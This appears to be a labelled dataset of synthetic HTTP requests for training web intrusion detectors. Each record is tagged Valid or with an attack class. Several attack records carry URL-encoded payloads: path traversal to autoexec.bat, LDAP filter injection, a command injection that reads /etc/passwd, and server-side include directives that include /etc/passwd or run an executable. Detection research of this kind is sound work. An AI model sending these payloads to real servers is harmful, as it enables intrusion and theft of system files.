Accept-Charset: *
Accept-Encoding: deflate;q=0.1, gzip;q=0.2, deflate;q=0.4, compress;q=0.9
Accept-Language: *
Cache-Control: vas='i'
Client-ip: 141.6.207.75
Cookie: btz=998;ri29itqihAelex=723979;eo=9;Nhr0doaddeseokn=8selreeesetssc
Cookie2: $Version="7"
Date: Fri, 22 Dec 06 12:28:17 CET
ETag: W/"@U5uH5BLCJXO7aQTFruz"
Expect: SkhguTri
From: fhTe@srylOs5.biz
If-Modified-Since: Wed, 07 Feb 07 04:17:40 GMT
If-Unmodified-Since: Tue, 05 Jul 05 10:25:31 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 08 Jan 05 14:01:02 UTC
Max-Forwards: 3398
MIME-Version: 0.8
Pragma: a41wY7i='E'
Proxy-Authorization: Digest username="eaorh"
Authorization: wahscE w1funtlr=bta3
Range: -972278
Referer: /bate0n/sH3c4lo.html
TE: trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: zrso8sAj/2.8
UA-CPU: Sparc
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 298x3014
Via: 1.0 16.3.246.115, FTP/1.4 www.muc4tsEs.htm
Transfer-Encoding: 9bdeto; vhwMi=ijao0M
Upgrade: tOgk/7.2, 57lv/3.4, zpxc/7.9
Warning: 869 39.20.119.131 "cruietilr4eat3pmses" 
X-Forwarded-For: 21.25.17.174
X-Serial-Number: 9376895954650597
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44967
Start - Id: 17820
class: Valid
GET /5_4RJIex1pviYb77SU/oneidyip89eeHp/erao2kBsO0phIvvnggne/qrA2/tFsW_GC78_2/ri/i40NMH4koVaZy_qmqu/nilepeeh1wassne/dderw5testaAite/ouwnikee2a9.jpeg?6alne8ron4z4tnv=0&n7Rtpes0eItWprh=eeohOauao9&nLIme=3244483&rostudy0e=6802&rtiodppe=%3At0astylealtEid&noeyti6o=balgt&tHa2aoytr=6348202&IGGtUn2JQ=osi4%3As%3Deditdshfsge%5Du HTTP/1.1
Host: www.dPaaiEeEA.net
Connection: openamtn
Accept: audio/*;q=0.9
Accept-Charset: *
Accept-Encoding: compress
Accept-Language: *;q=0.3
Cache-Control: max-stale
Client-ip: 161.131.239.25
Cookie: SnOeuy=a;ooevOtrmul9r=otrnke;fiatpw5fqro0=Davrbinftv
Cookie2: $Version="799"
Date: Sat, 08 Jan 05 01:45:27 CET
ETag: "b2Nd2bCIwJpI9gkeg9"
Expect: ugelm
From: khupg@oosaf.ch
If-Modified-Since: Tue, 19 Apr 05 09:00:16 CET
If-Unmodified-Since: Sat, 10 Apr 04 23:43:19 UTC
If-Match: "OZ-LITFq9NO3zrv"
If-None-Match: "uq9Yu5H@Gd9WWcVfaN"
If-Range: Sat, 16 Dec 06 13:26:18 CET
Max-Forwards: 67
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: NTLM ZXRlZGxtdGxlYWZ3ZXhsdWhqdGVTODhmdHRnZWF5YWVrZWxkOUxycm50Z3lRb2c=
Range: 76827-723747,02-548
Referer: /IisT.msf
TE: gzip;q=0.8,chunked,gzip;q=0.2
Trailer: Pragma
User-Agent: Mozilla/5.0 (X11; U; SunOS sun4u 2.9; eo-ct; rv:9.4.2) Gecko/82149226
UA-CPU: StrongARM
UA-Disp: 2638,7610,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 5851x4890
Via: HTTP/8.9 76.177.225.243, 6.9 www.ennaeii.html
Transfer-Encoding: gzip
Upgrade: 0e1dxo/9.3, 9olo/5.1
Warning: 772 19.4.250.196 "a2huUdChiyr6hamrt" 
X-Forwarded-For: 7.104.70.87
X-Serial-Number: 168409741956
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17820
Start - Id: 16607
class: Valid
GET /aXO-KflqKEM6A9/FTdAGzw/-Z8I.HsHt4/yDbMa9.nsf?hkd=158748&Pqd6tptaors=3619323 HTTP/1.1
Host: 228.88.54.61
Connection: close
Accept: image/jpeg, video/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: ltiNhin-abIlty;q=0.9, eoi-5gYN;q=0.9
Cache-Control: no-cache
Client-ip: 148.10.195.47
Cookie: 8wiTmop8eaibwi=21;o8aajitlt0sp=molptc7nsyi;ttaa=145;9EGpzpTchild@R=ioe;istuoanol=504271066;ldesoas=196
Cookie2: $Version="9"
Date: Sun, 14 Jun 09 18:19:29 UTC
ETag: "dP@cVrOnf6RldbCGxPY"
Expect: 100-continue
From: dwou@hguthnrf9e.org
If-Modified-Since: Fri, 18 Aug 06 01:53:32 UTC
If-Unmodified-Since: Thu, 08 May 08 22:25:12 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 18 Aug 06 18:24:41 UTC
Max-Forwards: 3
MIME-Version: 8.3
Pragma: no-cache
Proxy-Authorization: Digest opaque="rpsns9"
Authorization: Digest nonce
Range: 872-,754-,4693-
Referer: http://jhimsr.cz/t2hnRosn/Lhgqibdf.png
TE: trailers,gzip;q=0.4
Trailer: Connection
User-Agent: Mozilla/5.0 (Machintosh; U; Mac OS X 2.2; ee-5l; rv:2.8.1) Gecko/93092635
UA-CPU: StrongARM
UA-Disp: 049,0120,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 702x893
Via: FTP/2.8 www.Nirueo.png
Transfer-Encoding: gzip
Upgrade: Nca/5.9, s4h/1.3
Warning: 105 www.Ia3bwst.html "meseeoOE" 
X-Forwarded-For: 155.254.22.166
X-Serial-Number: 4070028617537255
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16607
Start - Id: 7624
class: Valid
POST /iIkdsOpibrEw0/aMNNBDzPQwx/ePes0/tfXX9P.asmx? HTTP/1.0
Content-Length: 101
Content-Language: cbt,eaR
Content-Encoding: compress
Content-Location: /rgevu/oahosk/ooeZe.rar
Content-MD5: cG9UaGFvYWxvY2tmcmxiZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 15 Mar 05 05:53:15 UTC
Last-Modified: Thu, 17 Mar 05 05:58:21 UTC
Host: www.6ot5u61t.org
Connection: close
Accept: */*;q=0.0
Accept-Charset: *;q=0.7
Accept-Encoding: *;q=0.1
Accept-Language: 5sqteio-fdEuRw6m;q=0.5, cllfer-ua0n8rNa, re3intu-t7raatft, WD-f
Cache-Control: no-cache
Client-ip: 136.161.142.168
Cookie: lcxBV0IgallfY9=aOV_K;aWsteonmuEs=i6Bhs6Tdti;stnoa2rrea=b?ilEedhcbW;DRDasystemwdSA=ohidtmle$9ateoa2x;s8o6hiwqads9=onpmrcppt
Cookie2: $Version="4"
Date: Sun, 14 Aug 05 20:46:20 UTC
ETag: "qi2unb4DKTAP9F9lw"
Expect: Ak8yU=inrte;sean2ch=ymte85R
From: Uam4ikh@nCececii2a.uk
If-Modified-Since: Fri, 28 Apr 06 10:47:39 CET
If-Unmodified-Since: Sun, 04 Jun 06 13:31:01 GMT
If-Match: "77Q-PiQN_D.AWr2_"
If-None-Match: "NgrJb-iPKtm@whOJxTu5"
If-Range: Tue, 23 Mar 10 12:56:04 UTC
Max-Forwards: 95
MIME-Version: 5.9
Pragma: nphecl='t'
Proxy-Authorization: Basic UzluZWhtbjp0dWxnbg==
Authorization: NTLM aXJObTBIcnNlaXRhd25zYXRhbmdocHhuZWltcGhlbmJPY2N0ZTdzZGV4b2I=
Range: 70517-,7-,66190-
Referer: http://www.7iricj.be/afKotgee/aedpgIwE.tar
TE: trailers,gzip;q=0.2
Trailer: Upgrade
User-Agent: Mozilla/7.4 (compatible; ndue11; Win 9x; o9fnho; gknbSx; lseee2jk)
UA-CPU: 68000
UA-OS: Windows NT
UA-Color: color32
Via: HTTP/3.1 3.109.89.44:5213, eOO/0.4 140.187.242.230:7, 8.8 128.58.115.36
Transfer-Encoding: l2ai8t
Upgrade: yyr85/0.6, mnLmta/7.1, sedrw/1.7, wRp3/3.2, ebe/4.8
Warning: 658 238.205.45.235 "heyNtneenncg" "Tue, 18 Dec 07 14:17:08 GMT"
X-Forwarded-For: 223.150.236.173
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

ra=87&srnmanffoci3hs=n7.&xebd0bd9jymif=5U0C3s5hoiwk&ac2Y=6045812&UuBPvq7betweeng=0&ryetHaNgeRa=uniong

End - Id: 7624
Start - Id: 45761
class: PathTransversal
GET /FHmgiR3Kn7rYL/nesfieosltrut3/oaccess_logJsm5Bereplace6B75/eTGcK/iWstylegch_kybyC/GiINsSuQasM32/asAtarrebnrraaohoi.aspx?htehc4=tcese3ilrEinnn%40opendrop&replaceOb0=eceaO2%24ts%3B&OtM2nVpddocument=2&iwAigltfysanEo2=so14im&eact=tm&i1Essnne=..%2F..%2F..%2FWINNT%2Fautoexec.bat&ArecolCvney4er=21770&aakyh2=rjp3gi&0hnpssueHiy=rqe9henfrohd&Tyt6hg2mhr=positionreplacedocument-d HTTP/1.1
Host: 43.64.159.38
Connection: close
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: *
Cache-Control: sep='rodFesq'
Client-ip: 94.195.108.172
Cookie: topeNaOserega=l]i;i.nw9hs3=Ot'1h;aabsoita=lhdrtettlOityeTi;fi30sa=ixjRqkI;deser=ore
Cookie2: $Version="51"
Date: Wed, 07 Jun 06 15:39:33 UTC
ETag: "w@SakA.S6HBsTLndJhJ"
Expect: aameaew
From: EelBbSo@eeaysiht.net
If-Modified-Since: Mon, 15 Dec 08 05:25:00 CET
If-Unmodified-Since: Thu, 08 Jan 04 01:01:32 GMT
If-Match: "phZOoCP_Yg8fQDTwm"
If-None-Match: *
If-Range: "gJqyo3ohhngxeIbr"
Max-Forwards: 512
MIME-Version: 8.4
Pragma: yireiEs='newnt'
Proxy-Authorization: Basic eXNFS21yOkxxaEhs
Authorization: Bid3jw ermmy=OefhS
Range: -500252,934-3694
Referer: /eauien/whlnm.mdb
TE: deflate;q=0.2,deflate,chunked;q=0.1
Trailer: From
User-Agent: Mozilla/1.6 (X11; U; Open BSD i386 0.3; b2-be; rv:4.9.7) Gecko/97974410
UA-CPU: MIPS
UA-Disp: 0244,7553,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 9810x7556
Via: FTP/1.5 72.252.178.74
Transfer-Encoding: identity
Upgrade: tlly5t/1.5
Warning: 366 www.qjwrkE.jpg:272 "oMcna8llngods" 
X-Forwarded-For: 156.175.229.133
X-Serial-Number: 8409681186997
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 45761
Start - Id: 38861
class: LdapInjection
GET /fidE3rdtR0nroptoqol/eiIpyS1fF24FgMKtbu/uIln.bin?e8xc=5155&eAeyeHdee=95jhLibg&3jCrsuProert0=05258401&zL9sy2v7ese=0&qmo=wewzStPAqEYf&2l=hVK-kT8&btibte=060934&ntTdodds2qti=66242&link91UUNlz5h=E0%3C5ah0img&6hhr=rfaIxRQrKM7o&ir=%29%28++++%7C++%28++++cn%3D*o%27brien*%29%28mail+%3D*o++%27brien*+++%29+&tU2ieechlfVg=909905&ntlehee=hgasrsrOs&DswonrsECeuyNb=60011&lrg=szE86Yo HTTP/1.0
Host: www.chieeelse.fr
Connection: close
Accept: application/*, audio/x-wav;q=0.6
Accept-Charset: *
Accept-Encoding: deflate;q=0.6
Accept-Language: *
Cache-Control: yt9ai=A
Client-ip: 214.111.130.134
Cookie: eieieot5n=errnanE Eva ;n.nBwinntnfeL=29939;X0Y-xnA49O73=rsiB53lfogtoiefd;E3xht5nge=541275;peworNgsa=A9orKiM2xlt6eha;roik=elogliteae
Cookie2: $Version="90"
Date: Sun, 13 May 07 12:14:50 UTC
ETag: "vPqCh0e@JCG5mEQa3dQ"
Expect: t02I
From: tdusret@b5koNnc.biz
If-Modified-Since: Thu, 26 Jul 07 24:07:21 GMT
If-Unmodified-Since: Thu, 31 Jan 08 21:59:36 CET
If-Match: *
If-None-Match: "-TK5-yCJjZAv.aKI7jV"
If-Range: *
Max-Forwards: 17
MIME-Version: 5.1
Pragma: OeklI=txt
Proxy-Authorization: Basic ZWxOdWE6b2VwZG53eQ==
Authorization: Digest opaque="xEati"
Range: 317-,-056
Referer: /Ln9is/Laeer6t.fgf
TE: gzip;q=0.5,gzip,deflate
Trailer: Accept-Language
User-Agent: iZtmpno (n7IGqVf)
UA-CPU: PowerPC
UA-Disp: 117,0811,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 279x383
Via: 1.3 134.108.212.227:66709, FTP/1.6 105.255.212.120:074, HTTP/3.3 www.dEhdyr.css
Transfer-Encoding: gzip
Upgrade: tey/4.0, 12heee/5.9, ilc/0.2, rztl/8.5, cehnt/0.1
Warning: 172 228.33.193.154 "nienhhonlnuio8cmpet" "Sat, 12 Aug 06 02:08:19 GMT"
X-Forwarded-For: 145.148.155.9
X-Serial-Number: 74857144808284221
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 38861
Start - Id: 43510
class: OsCommanding
GET /nNm/u_v7hYROJjiSF/1gmeEjgo/ubf/cXcfEqdN/ya/otmhttps05A.jpg?KjvDvbscriptYtg=669&67as23=%7C+cat+..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd++%7C&nahuKgn=348056 HTTP/1.1
Host: 198.150.23.78
Connection: keep-alive
Accept: video/quicktime
Accept-Charset: windows-1255
Accept-Encoding: 
Accept-Language: 9-0dsSenPs
Cache-Control: no-store
Client-ip: 108.184.195.217
Cookie: O2Kbodylwinnt-J5SA=2affa;l1ano=781;rn9undree0=0970613;Es=urmxstIecxNew;esret9=he=/;6a=nhn
Cookie2: $Version="916"
Date: Thu, 22 Apr 10 08:27:20 GMT
ETag: W/"CTMBNkc9JtBstBs"
Expect: 100-continue
From: rb2eklg@erhan.net
If-Modified-Since: Sat, 30 Jan 10 12:13:26 CET
If-Unmodified-Since: Mon, 08 Nov 04 16:29:50 CET
If-Match: *
If-None-Match: "P-yUhU_dJIveflm"
If-Range: "1ZU9398dK_L5iHE4q@U"
Max-Forwards: 7
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: Basic bFJvZ25nOmVmVGNx
Authorization: Digest username="nSpsc"
Range: 32-61,4386-85
Referer: /ceeapoIr/Hfeaeosn/lAyve.mdb
TE: trailers,deflate;q=0.5,trailers
Trailer: Range
User-Agent: Mozilla/2.4 (X11; U; Unix 1.1; fw-io; rv:6.7.1) Gecko/52434436
UA-CPU: MIPS
UA-Disp: 034,8508,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 5281x2497
Via: 7.8 www.apz5po4E.css
Transfer-Encoding: compress
Upgrade: tlle/3.2, ouiu/2.7, 6nb/4.0, iuoaC/4.5, ioatma/4.1
Warning: 156 193.81.211.74 "9aeu3wesnnaer" 
X-Forwarded-For: 134.201.54.76
X-Serial-Number: 521013041943
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43510
Start - Id: 9150
class: Valid
GET /PeiahpacEizutt/nullr@4voOlV/leorg/rNUbWSs/tg_Y/XG_tfd9Cpositionpositionpm/sled/1zC/emmumd.js?ra=mZGxVi7ZQ0nz&Rsr3aghsq=te4w&bntoudi290to=leZkv0iTEa4&ens=64431&c0W=tm6a%40BUSjI&nWsoon=49998436&8A9Q=ew&m9haDe9h4=rahdxiqe+l&roebe2t6e=aeunionc&apngra2xcaa8FY=duondTfhwomlai&uite=sek6c&Ea0maaeee=opt&nYnKy0LmyBDS=ztsraek&ecMs=ridd HTTP/1.0
Host: 131.143.125.219
Connection: keep-alive
Accept: audio/*;q=0.4, audio/*;q=0.1, text/xml
Accept-Charset: windows-1258;q=0.8, iso-8859-15, x-mac-japanese, euc-jp, euc-tw
Accept-Encoding: *;q=0.6
Accept-Language: *
Cache-Control: max-age=30411
Client-ip: 5.125.5.68
Cookie: _VUyZQopenXv@f=sr2ptrizie9a;nr8SUX8_img=76579;nlyfapayeejY=493;ao9onasduap= $bqh
Cookie2: $Version="2"
Date: Fri, 30 Sep 05 19:51:58 UTC
ETag: W/".ajCxE0M.Oz61Gz2R"
Expect: 100-continue
From: eoykeh@pmat.fr
If-Modified-Since: Sun, 12 Oct 08 21:16:31 UTC
If-Unmodified-Since: Thu, 10 Jun 04 11:22:31 UTC
If-Match: "iMcZzGTq-_zcG@rf5Jn"
If-None-Match: "AIWCJV.HPjOIitsh"
If-Range: *
Max-Forwards: 6
MIME-Version: 9.1
Pragma: no-cache
Proxy-Authorization: Digest qop=fe4a
Authorization: NTLM aHBydHRyZHVlZ2UybzdoZXVhb2FvYnY2c3EzZkdkYWJpeG9udnV1Z2lvOWVldWE=
Range: -7586
Referer: http://we4StSe.gov/Coqodxhs.tar
TE: trailers
Trailer: Date
User-Agent: Mozilla/9.5 (Windows; U; Win98 9.8; so-ig; rv:2.9.3) Gecko/35644097
UA-CPU: MIPS
UA-Disp: 104,519,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 0794x264
Via: FTP/0.5 www.4mnos4.shtml, 7.9 www.E3eiic.png, FTP/8.8 22.114.176.25:3894
Transfer-Encoding: compress
Upgrade: mapEt/8.1, RNae/5.1
Warning: 458 www.ut4swaua.html:71 "henawlaet6dg" 
X-Forwarded-For: 189.85.16.83
X-Serial-Number: 688483710117371
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9150
Start - Id: 16986
class: Valid
GET /b7O/dX36CKCBI6Ak6A/NHy/i0/bZ5zppA/XG6PlmlF9/yWIKTN1VDrNKZBo/oqkBjF1wSfB0vsc30S.bin?gn5n=oYO6yqSK6a&ir=snstzhoBxhehbPlyne&eaChw=9909 HTTP/1.0
Host: 118.20.172.76
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: iso-8859-8-i;q=0.1
Accept-Encoding: *;q=0.5
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 171.127.105.157
Cookie: yyhloSci= ;iailssg=|4niframeru=g;hYseAmNlre8oSry=1342;tb8mv=3967909;aheERletmsi=os;axhuTo=2nks 
Cookie2: $Version="12"
Date: Sat, 16 Apr 05 08:41:24 GMT
ETag: W/"y96Y2OBz57MMDPMG"
Expect: 100-continue
From: tilh7o8@rkyx6lf.net
If-Modified-Since: Tue, 16 Jun 09 03:30:29 CET
If-Unmodified-Since: Sun, 26 Feb 06 15:48:08 CET
If-Match: "QR3_K@@IAqbumzRx"
If-None-Match: *
If-Range: Sun, 09 Apr 06 18:22:48 GMT
Max-Forwards: 9
MIME-Version: 0.9
Pragma: no-cache
Proxy-Authorization: Basic ZWVvaXNSbDplbG9kV2VhdA==
Authorization: Digest nc=1596bdD5
Range: -1680
Referer: /dae7Det/twub/noa6br6/mals/3ifag.shtml
TE: trailers
Trailer: Proxy-Authorization
User-Agent: rercare0mbnK
UA-CPU: x86
UA-Disp: 5788,856,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 366x7717
Via: 3.0 60.37.157.184
Transfer-Encoding: compress
Upgrade: xInLof/6.3
Warning: 325 113.145.246.23:44456 "TcfseuxEeh6hlbirt" 
X-Forwarded-For: 86.116.223.77
X-Serial-Number: 44944819
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16986
Start - Id: 39327
class: SSI
GET /aFj15FL_GgYRmCJ/uute/dw.KCmS0RE1GVxFGd/hU29LJ@XSn-9vFFREG@/iFwEMzj-FM1@vwA/brnOrtdrhtw/mJdUzGEjx/ssAoitluhti2hNyta.jpg?telnetBnP=ttrTv&st5xax=dKX&Lsdcqe3rwE=03683175&lpKHandw_s_=n+%40bhl1eao&jSmexecUG=0062219&elije=%3D7having&msgtctwe58=%3C%21--%23echo+var%3D%22date_gmt%22--%3E&fcrafeage=ewry HTTP/1.0
Host: www.5ncee.fr
Connection: keep-alive
Accept: image/*;q=0.8
Accept-Charset: *;q=0.7
Accept-Encoding: deflate;q=0.3, compress;q=0.3, deflate;q=0.9
Accept-Language: fionWeu-sh, a-tieuxac;q=0.4, 7a-s, eoutned-mlifowro, iNLem-liail
Cache-Control: gc='netata'
Client-ip: 108.73.42.141
Cookie: odgoo=D1tfi;eeEn5xg2eSa=184788;ehr18=5869314189;rle= &Saoheh
Cookie2: $Version="44"
Date: Sun, 13 Jan 08 14:35:17 GMT
ETag: "NkGZJgLmq2ooIWKkf"
Expect: 100-continue
From: fiaotu@eNeFi.it
If-Modified-Since: Thu, 23 Jul 09 20:04:05 UTC
If-Unmodified-Since: Fri, 10 Apr 09 23:55:52 GMT
If-Match: *
If-None-Match: *
If-Range: Fri, 19 Mar 10 23:09:39 CET
Max-Forwards: 27
MIME-Version: 5.7
Pragma: xa=eti7n8
Proxy-Authorization: Digest opaque="nbcimQad"
Authorization: Digest algorithm=bg8hmtq
Range: -7892
Referer: http://www.eanrl.st/bnbs4io/td0oTT/srti/nou6pohe.tiff
TE: trailers,trailers
Trailer: Host
User-Agent: wmhRsft (nc@gSOeD)
UA-CPU: x86
UA-Disp: 593,4970,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 9132x248
Via: HTTP/2.9 www.eiaYgktt.css, 6.8 www.tlWno.tiff, 7.9 www.5vsec.png
Transfer-Encoding: enlrrt
Upgrade: hsyn/7.1
Warning: 603 www.gfjcoE2.gif "tntsi" "Thu, 02 Nov 06 09:59:58 UTC"
X-Forwarded-For: 252.189.82.224
X-Serial-Number: 802337450581
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39327
Start - Id: 39669
class: SSI
GET /havingOmd/noahIetrerhhisci/NLacb2t/bnedasloiaaUl2nmhnSl/e24esfeaEnddOmed/hefhnx4h2ea.bin?LwedctNyoihmoo1=753924&5locationlVUm0aBfc=Tolocation&au4mpoLad=nhi6Retyi2ztsnyk&umetn5=rlrsKfeahkn&te1t=5&itsa=rposition&WdKWo7ha=5895787658&aT=%3E&edt=%3Eolbody&slehctr5vof=44449&fw=loh&h5erp=h2Xc&e5yTtu4naTh=9131&azeoesrtnam7a92=%29mi7o2nRj&imntcar3ldono=%3C%21--++%23include+++++virtual%3D%22%2Fetc%2Fpasswd%22++--%3E HTTP/1.0
Host: 10.135.146.30
Connection: close
Accept: audio/*, audio/basic;q=0.3
Accept-Charset: x-mac-japanese, iso-8859-8, x-mac-hebrew;q=0.7, x-mac-ce;q=0.8
Accept-Encoding: *
Accept-Language: *;q=0.6
Cache-Control: min-fresh=76716
Client-ip: 38.60.133.84
Cookie: ntalupsexOe=eeTn;jbnHs=3;ZYk_Fsystemmfsi.l=4;ed2iimsdBoe=7440;tri0hrs=d+6lcH
Cookie2: $Version="57"
Date: Fri, 29 Jun 07 08:51:16 GMT
ETag: W/"29HGJ_DdyE7QI-wj"
Expect: 100-continue
From: l5vtEst@R8caTefna.fr
If-Modified-Since: Tue, 01 May 07 21:13:30 CET
If-Unmodified-Since: Mon, 25 Dec 06 14:55:22 UTC
If-Match: *
If-None-Match: "GNA9-AmAhp8X3WPux9"
If-Range: *
Max-Forwards: 40
MIME-Version: 4.2
Pragma: okHr='lsnaw'
Proxy-Authorization: n0eu ard9hoW=9os6s
Authorization: yrauwn ng8rwsu=eto9ysu
Range: -7190
Referer: /dUh2ib.mspx
TE: trailers,deflate
Trailer: Upgrade
User-Agent: teiuOrei (mH8DF_uUCZ; iJ7mezBb)
UA-CPU: 68000
UA-Disp: 3162,764,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 8969x195
Via: 6.7 79.246.123.16
Transfer-Encoding: identity
Upgrade: keeao/1.8, ytF/7.1
Warning: 273 www.Sneje.htm "srzSNAitebchch" "Mon, 20 Dec 04 23:29:19 UTC"
X-Forwarded-For: 166.133.168.205
X-Serial-Number: 919920115
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39669
Start - Id: 18009
class: Valid
GET /sUO1/iwk9ezhas5A/jUGPIU7NVjg/edSrsnhWdngdht/SpxOoobject/ieeyde7q6oys8z/iitoetedlchiDu.png?pl=tvG2.i0W4a75&1ttujodUtnrn=vww&wziPlvt=tuHI30HDSQ&aenstSzaanrk=nmeNiteofl&AstItFssmiTer=lw&oishxjnn5tqh=errw HTTP/1.1
Host: 18.176.59.185
Connection: keep-alive
Accept: text/xml
Accept-Charset: iso-8859-8-i;q=0.8, x-mac-chinesesimp;q=0.9
Accept-Encoding: gzip, identity;q=0.3, compress, gzip;q=0.8, identity
Accept-Language: *;q=0.4
Cache-Control: no-cache
Client-ip: 67.183.104.222
Cookie: aogd2buofuSnq=5
Cookie2: $Version="288"
Date: Sun, 17 Feb 08 14:32:02 CET
ETag: "KKiktc_31xb1pEF-S"
Expect: 100-continue
From: 1fhht@jeisbtlV.biz
If-Modified-Since: Tue, 10 Feb 09 01:47:21 CET
If-Unmodified-Since: Tue, 20 May 08 04:08:55 CET
If-Match: *
If-None-Match: "D8-o4a@VdqT6d25KEtOu"
If-Range: *
Max-Forwards: 6930
MIME-Version: 4.7
Pragma: y='tec6p2'
Proxy-Authorization: Digest uri=http://ksSrmna.ch/he8c/tvrHsfIh/uruss.mp3
Authorization: Basic ZWNuaW86aTRvYkFj
Range: -97846,05989-6,385-85231
Referer: /lsel/tnoR.ace
TE: deflate,trailers,trailers
Trailer: Range
User-Agent: iwTa61hef (sPYXc3YfN-; n8gW1pZx; i23M68G2k; tdFjVd; nzQ.Uyer)
UA-CPU: x86
UA-Disp: 8850,7638,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 9181x5761
Via: crniea/6.0 151.18.175.218, FTP/6.3 www.wep9iE3C.tiff, 6.7 www.ooEnA.jpg
Transfer-Encoding: gzip
Upgrade: ii7hn/3.4, rwte/5.6
Warning: 949 59.202.70.214 "dniryhss1asaesunNun" "Wed, 17 Jun 09 23:54:21 GMT"
X-Forwarded-For: 104.233.139.60
X-Serial-Number: 094321
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18009
Start - Id: 40328
class: SSI
GET /autoexecTtnodeMUA5bgsoundb/e5kZV3-kw/sbhOgZwRVm/eodtsEo34.dll?ao=lzAC3&qop92e=86&oryizs48efe=23&tilas=g2lgiafsa&nIyiena3e1=ipQxJp8l7ckR&2itmt38=txuk6or&meejyteOf9rsehg=murynnben+-co&hauyE9tn99d=%3C%21--+++%23exec+++++cmd%3D%22c%3A%5Cprogra%7E1%5CaRweal%5Csoicst%5CttinlDs.exe+++d%3A%5Coyob%5Cwww.enel.org%5Cyo0nsopa%5Cdatabase.mdb+++++%2Fx+++exporttofoxpro%22--%3E HTTP/1.1
Host: www.owlg8toRS.gov:8078
Connection: close
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: *
Accept-Language: *;q=0.3
Cache-Control: no-transform
Client-ip: 16.173.119.208
Cookie: 6rdwwCxtmewRnr=ey6iadhEAoreeAaSn;xeesbd=8860562;mige=hv1;qDtBsM=trt9Aozz3tttpd;paAltuimojsszyZ=ss~
Cookie2: $Version="2"
Date: Thu, 06 Aug 09 16:46:48 UTC
ETag: "32_@SBUduCwDYWRv4fKP"
Expect: ccsse4bt=cbiilhnm;orhesiE
From: hTihs@4oAMasocxd.biz
If-Modified-Since: Sat, 29 May 04 10:25:42 UTC
If-Unmodified-Since: Thu, 10 Feb 05 05:28:10 GMT
If-Match: "ngB0yTr_2G-V1bW"
If-None-Match: *
If-Range: Sat, 25 Feb 06 06:00:54 UTC
Max-Forwards: 8525
MIME-Version: 0.0
Pragma: 2o='jaes'
Proxy-Authorization: intehp 4edI=sr6n1ysd
Authorization: Basic Ym50RXBlc2U6NXN3dW0=
Range: -2115,0045-233,-51
Referer: /8Iinl/rcdeT.ace
TE: trailers,gzip;q=0.2
Trailer: If-None-Match
User-Agent: 8H.57QUq1 http://www.bord.cz
UA-CPU: MIPS
UA-Disp: 996,846,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 8587x911
Via: 7.4 185.129.207.227, 1.5 www.gRekaxe.js, 3.0 www.diioteec.htm
Transfer-Encoding: gzip
Upgrade: aTEi/5.9
Warning: 573 www.ia9l.gif "0z3jntig9e" "Sat, 15 Nov 08 15:12:00 GMT"
X-Forwarded-For: 85.243.213.174
X-Serial-Number: 475557970524
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 40328
Start - Id: 12335
class: Valid
GET /xteiuvlis6orrhoe7/tPw@rc_MoyS.@/i7UUH7O9/cHkknH_j5micXhsOIa/d0i/iaB1fH_kuNF03.aAmFTa.html?anehAcatnncor=cuxeestx&t8ernohotfnqla=7005&lsLG-xj_PUinsertG=924&ldSsgt1a50eno=6&lhalOjhesimae=Ra4q7e HTTP/1.1
Host: www.rqfmpoe31i.gov
Connection: close
Accept: */*;q=0.8
Accept-Charset: big5, x-mac-ce, cp-932;q=0.6
Accept-Encoding: *
Accept-Language: brTzwme-Une;q=0.9, cyfpu4-fa, OawAdiJ-fylko;q=0.4, ecte-aajt
Cache-Control: max-stale
Client-ip: 26.201.194.45
Cookie: mlLlhXriWauarne=leCw3
Cookie2: $Version="97"
Date: Fri, 01 Jun 07 12:04:07 CET
ETag: W/"HRo_O6CCOGzRZ7ilvJ6"
Expect: 100-continue
From: atRwrmd@teke.it
If-Modified-Since: Thu, 25 Nov 04 08:12:04 CET
If-Unmodified-Since: Sun, 26 Jul 09 08:28:09 CET
If-Match: "vkeY@Jt8R_iPJOv"
If-None-Match: *
If-Range: Wed, 25 Feb 04 10:08:52 GMT
Max-Forwards: 1262
MIME-Version: 2.7
